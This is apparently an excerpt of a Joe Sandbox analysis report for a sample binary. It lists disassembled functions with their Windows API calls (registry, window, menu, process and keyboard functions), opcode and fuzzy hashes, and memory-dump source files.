Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 419ce02f8eda7c3b5ed27c55ac6dd523f17a96a48cd93009d6d091605c9d6385
Instruction ID: 21335bf51572bd45c5bd0b4136331fc639afa94b1a9aae279165b38df670159a
Opcode Fuzzy Hash: 419ce02f8eda7c3b5ed27c55ac6dd523f17a96a48cd93009d6d091605c9d6385
Instruction Fuzzy Hash: 2BF09A32A397116AE6347B74BC07B8E7690DF02738F200A2AF461C60D2EFF0894161A0

Function 00C3406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C33F85), ref: 00C34085
GetProcAddress.KERNEL32(00000000), ref: 00C3408C
EncodePointer.KERNEL32(00000000), ref: 00C34097
DecodePointer.KERNEL32(00C33F85), ref: 00C340B2

Strings

combase.dll, xrefs: 00C34080
RoUninitialize, xrefs: 00C34074

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 0f38b653ee5a7f62b327d4aef37953c0a614c461c34f259968bedb1fa41bec15
Instruction ID: abce74a021f83dab232709fe7401bd8d369e0d4d24b2c653e0392e175223588b
Opcode Fuzzy Hash: 0f38b653ee5a7f62b327d4aef37953c0a614c461c34f259968bedb1fa41bec15
Instruction Fuzzy Hash: D0E09970A92252ABEA24AF65EC0DB0D3BA4BB04B46F10403AF111F10F0CBBA9601CA16

Function 00C764B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C7660B
_memmove.LIBCMT ref: 00C76546

Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC

_memmove.LIBCMT ref: 00C765B9
_memmove.LIBCMT ref: 00C766A0
_memmove.LIBCMT ref: 00C766B9
_memmove.LIBCMT ref: 00C766D5

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 51945d54c3f8c0ccc4411b98a6fdda64bcd9e1a3578c2feb254a5296041c596c
Instruction ID: 04604ab667922bc0fffed6c63a3065e1bc0978a9118b36a620eb1ddc58e15797
Opcode Fuzzy Hash: 51945d54c3f8c0ccc4411b98a6fdda64bcd9e1a3578c2feb254a5296041c596c
Instruction Fuzzy Hash: B5618C3190065A9BDF01EF60CC91EFE3BA9EF05308F448519F8596B192DB35E945FB50

Function 00C901E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

Part of subcall function 00C90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C902BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C902FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C90320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C90349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C9038C
RegCloseKey.ADVAPI32(00000000), ref: 00C90399

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 969b997c6e97aa446622f3ade32c8040040d12df19073aa06c338337e5c6431b
Instruction ID: cb1689b1c1d403392f0deff67b21974f97448a37ecc781a1a47879fd206b49cf
Opcode Fuzzy Hash: 969b997c6e97aa446622f3ade32c8040040d12df19073aa06c338337e5c6431b
Instruction Fuzzy Hash: 07514D31208204DFCB14EF64C889EAEBBE9FF85314F14491DF455872A2DB31EA45EB52

Function 00C95799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00C957FB
GetMenuItemCount.USER32(00000000), ref: 00C95832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C9585A
GetMenuItemID.USER32(?,?), ref: 00C958C9
GetSubMenu.USER32(?,?), ref: 00C958D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00C95928

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 55a464b496231f1e1fc70c6e3329516f9e4fb19f2b6899d6d4dae967baff7840
Instruction ID: b2606bb537dd488996a4b70ae88a04d0c45e652d691af1d147370759e2ddb51e
Opcode Fuzzy Hash: 55a464b496231f1e1fc70c6e3329516f9e4fb19f2b6899d6d4dae967baff7840
Instruction Fuzzy Hash: 46518031E00615EFDF11EF64C859AAEBBB4EF48310F104069E812BB391CB70AE42DB94

Function 00C6EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C6EF06
VariantClear.OLEAUT32(00000013), ref: 00C6EF78
VariantClear.OLEAUT32(00000000), ref: 00C6EFD3
_memmove.LIBCMT ref: 00C6EFFD
VariantClear.OLEAUT32(?), ref: 00C6F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C6F078

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: c5ca9b3a85444bfad6d5e4c6063ac9624a33b0a147a6ccb47e3afed7c18a7fe4
Instruction ID: 2a25cd8c6a8cf9a090aea358ec38e07fc6c0d35fd63a59400c1988ce8ded6bb6
Opcode Fuzzy Hash: c5ca9b3a85444bfad6d5e4c6063ac9624a33b0a147a6ccb47e3afed7c18a7fe4
Instruction Fuzzy Hash: 9B516D75A00209DFCB24CF58D884AAAB7B8FF4C314B15856EE959DB301E734E911CF90

Function 00C7220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C72258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C722A3
IsMenu.USER32(00000000), ref: 00C722C3
CreatePopupMenu.USER32 ref: 00C722F7
GetMenuItemCount.USER32(000000FF), ref: 00C72355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C72386

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 531fffce25f8e70fe6c9637330b248ba01726a7ffcea0987a54ef1008293d227
Instruction ID: 4501b14afd8da46a016439b61f914d29a9f2916e1e58b8dc4eda28a2ac23d169
Opcode Fuzzy Hash: 531fffce25f8e70fe6c9637330b248ba01726a7ffcea0987a54ef1008293d227
Instruction Fuzzy Hash: 3C51A170600249DFDF25CF68D888BADBBF9FF45318F10C22AE869972A1D3749A45CB51

Function 00C11765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00C1179A
GetWindowRect.USER32(?,?), ref: 00C117FE
ScreenToClient.USER32(?,?), ref: 00C1181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C1182C
EndPaint.USER32(?,?), ref: 00C11876

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: fcfeb977d9557d34dad68541a120dbd144eacc93a3c78f08b677749312e8f6f9
Instruction ID: 306f11e84f6d526cec73dd9144d55368ce7e2010bf187aa524f23c64f5e4e20c
Opcode Fuzzy Hash: fcfeb977d9557d34dad68541a120dbd144eacc93a3c78f08b677749312e8f6f9
Instruction Fuzzy Hash: 76419F71104700AFD710DF25CC88BAA7BE8FB46724F18462AFAA4C62E1C7349985EB61

Function 00C9B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00CD57B0,00000000,00EF5CD8,?,?,00CD57B0,?,00C9B5A8,?,?), ref: 00C9B712
EnableWindow.USER32(00000000,00000000), ref: 00C9B736
ShowWindow.USER32(00CD57B0,00000000,00EF5CD8,?,?,00CD57B0,?,00C9B5A8,?,?), ref: 00C9B796
ShowWindow.USER32(00000000,00000004,?,00C9B5A8,?,?), ref: 00C9B7A8
EnableWindow.USER32(00000000,00000001), ref: 00C9B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C9B7EF

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 1a67f6db947a06d8143b3e8d7f8fedc9bec728b3f8c48433788458fe5cf24a5e
Instruction ID: a73812fee956039e546eb0aa1847542fafa68b19d280333964a2e60e8f683399
Opcode Fuzzy Hash: 1a67f6db947a06d8143b3e8d7f8fedc9bec728b3f8c48433788458fe5cf24a5e
Instruction Fuzzy Hash: 1C414F34600240BFDF26CFA4E59DB947BE1FF85310F1842A9E9588F6A2C731AD56CB61

Function 00C8709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00C84E41,?,?,00000000,00000001), ref: 00C870AC

Part of subcall function 00C839A0: GetWindowRect.USER32(?,?), ref: 00C839B3

GetDesktopWindow.USER32 ref: 00C870D6
GetWindowRect.USER32(00000000), ref: 00C870DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C8710F

Part of subcall function 00C75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC

GetCursorPos.USER32(?), ref: 00C8713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C87199

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 4f25577af867f217957aa3a8e2754f65fea8f59b6a994fedeaa6d8a2d9b0320f
Instruction ID: 8b5c81b3247372ff7625199fdeb93cb4889658cda93f1313f7f587f9feab2863
Opcode Fuzzy Hash: 4f25577af867f217957aa3a8e2754f65fea8f59b6a994fedeaa6d8a2d9b0320f
Instruction Fuzzy Hash: 6F31D272509305ABD720EF14C849B9FB7A9FF88314F100A2EF599D7191D670EA09CB96

Function 00C68879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C680A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C680C0
Part of subcall function 00C680A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C680CA
Part of subcall function 00C680A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C680D9
Part of subcall function 00C680A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C680E0
Part of subcall function 00C680A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C680F6

GetLengthSid.ADVAPI32(?,00000000,00C6842F), ref: 00C688CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C688D6
HeapAlloc.KERNEL32(00000000), ref: 00C688DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00C688F6
GetProcessHeap.KERNEL32(00000000,00000000,00C6842F), ref: 00C6890A
HeapFree.KERNEL32(00000000), ref: 00C68911

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: dbc8d2a63a117e18196140a5b6e8dc7092ca3bc778af2df0db463a4bf143bc6e
Instruction ID: 466512cffad7afe3779ecd512423146be1a713b6abbfe99df24bec02af0c13e4
Opcode Fuzzy Hash: dbc8d2a63a117e18196140a5b6e8dc7092ca3bc778af2df0db463a4bf143bc6e
Instruction Fuzzy Hash: E411B131501209FFDB209FA4DC49BBE7768EB45311F10422EE895D7110CB329E19DB60

Function 00C685B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C685E2
OpenProcessToken.ADVAPI32(00000000), ref: 00C685E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C685F8
CloseHandle.KERNEL32(00000004), ref: 00C68603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C68632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00C68646

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 34150b4bb1248cdc472e057d7d0428870e47a9a2e63255bb1c527ac176389de3
Instruction ID: bc1a9d28906b1e17f46fa6fa3b99c1ac3b27126b8c84dd154812414fd47e76ff
Opcode Fuzzy Hash: 34150b4bb1248cdc472e057d7d0428870e47a9a2e63255bb1c527ac176389de3
Instruction Fuzzy Hash: 25115C72500209ABDF128FA4DD89BDE7BA9EF08344F044169FE05E2160C771CE65DB60

Function 00C6B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C6B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00C6B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C6B7CD
ReleaseDC.USER32(00000000,00000000), ref: 00C6B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C6B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00C6B7FE

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 20f121ce859262df488d2d61bbae485b84aa926104b8d9390780cf6356d82d1d
Instruction ID: 245994fc5b8c9c62ec0e81377a31940e2e9792dfe2fd37758835d6f0fa29e806
Opcode Fuzzy Hash: 20f121ce859262df488d2d61bbae485b84aa926104b8d9390780cf6356d82d1d
Instruction Fuzzy Hash: 20018875E00309BBEB105BA69C49B5EBFB8EB48311F004076FA04E7291D6309D11CFA0

Function 00C30162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C30193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00C3019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C301A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C301B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00C301B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C301C1

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: fc17ef7a635e52380f69e357eda00edf8ed1988be418d017a0495cfcdae8468b
Instruction ID: 89d85e25152b73394363d44d3913847edf830fd37ea548ee8650d962df9a37a7
Opcode Fuzzy Hash: fc17ef7a635e52380f69e357eda00edf8ed1988be418d017a0495cfcdae8468b
Instruction Fuzzy Hash: 4E0148B09017597DE3008F5A8C85B56FEB8FF19354F00415BA15887941C7B5A864CBE5

Function 00C753E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C753F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C7540F
GetWindowThreadProcessId.USER32(?,?), ref: 00C7541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C75437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7543E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 5b8e187c6d8b451168b08a68e8ccd8a05bfc7de24e3534fe67ecb9501031700e
Instruction ID: eb9597df9fc6c6838d45d2f588923c4065ed644076cd60ce17f26ba41f8b0d33
Opcode Fuzzy Hash: 5b8e187c6d8b451168b08a68e8ccd8a05bfc7de24e3534fe67ecb9501031700e
Instruction Fuzzy Hash: 3FF03032641658BBE7215BA2DC0DFEF7B7CEFC6B11F00016EFA14D1061D7A51A0286B5

Function 00C77230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00C77243
EnterCriticalSection.KERNEL32(?,?,00C20EE4,?,?), ref: 00C77254
TerminateThread.KERNEL32(00000000,000001F6,?,00C20EE4,?,?), ref: 00C77261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C20EE4,?,?), ref: 00C7726E

Part of subcall function 00C76C35: CloseHandle.KERNEL32(00000000,?,00C7727B,?,00C20EE4,?,?), ref: 00C76C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00C77281
LeaveCriticalSection.KERNEL32(?,?,00C20EE4,?,?), ref: 00C77288

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
